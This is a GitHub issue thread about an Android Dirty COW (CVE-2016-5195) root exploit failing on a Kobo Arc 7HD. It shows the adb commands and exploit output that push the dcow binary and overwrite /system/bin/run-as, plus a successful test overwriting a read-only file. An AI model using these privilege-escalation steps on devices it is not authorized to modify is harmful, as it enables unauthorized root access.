CVE-2016-5195 icon indicating copy to clipboard operation
CVE-2016-5195 copied to clipboard

Published 20 hours ago verified publisher icon timwr

Kobo Arc 7HD gives a "bus error"

Open eloydegen opened this issue 1 year ago • 1 comments

Running make root:

[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 29.5 MB/s (17880 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 79.8 MB/s (13784 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (13784) and destination file size (9464) differ
         corruption?

[*] size 13784
[*] mmap 0x401f6000
[*] currently 0x401f6000=464c457f
[*] using ptrace method
[*] check thread starts, address 0x401f6000, size 13784
[*] ptrace thread starts, address 0x401f6000, size 13784
[*] madvise thread starts, address 0x401f6000, size 13784
Bus error

However, running make test:

[eloy@t480 CVE-2016-5195]$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 59.9 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed, 0 skipped. 2.7 MB/s (367 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2023-12-13 23:58 test
-rwxrwxrwx shell    shell         367 2023-12-13 22:56 test.sh
-r--r--r-- shell    shell          18 2023-12-13 23:58 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x40175000
[*] currently 0x40175000=72756f79
[*] using ptrace method
[*] check thread starts, address 0x40175000, size 18
[*] ptrace thread starts, address 0x40175000, size 18
[*] madvise thread starts, address 0x40175000, size 18
[*] check thread stops, patch successful, iterations 3
[*] ptrace thread stops, return code sum 0, iterations 4047
[*] finished pid=3302 sees 0x40175000=6e6c7576
[*] madvise thread stops, return code sum 0, iterations 65420
[*] finished pid=0 sees 0x40175000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

What is going wrong here?

eloydegen avatar Dec 13 '23 22:12 eloydegen

I reverted the repo a few commits back to test for regressions, now it get the following with HEAD at db1813c826c8738a3159743dc175964bedd5a608:

[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 89.0 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 53.1 MB/s (13784 bytes in 0.000s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (13784) and destination file size (9464) differ

corruption?

[*] size 13784
[*] mmap 0x40259000
[*] currently 0x40259000=464c457f
[*] using ptrace method
[*] madvise = 0x40259000 13784
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
[*] ptrace -1 15
[*] exploited 4043 0x40259000=464c457f

Which might be related to #84.

eloydegen avatar Dec 13 '23 23:12 eloydegen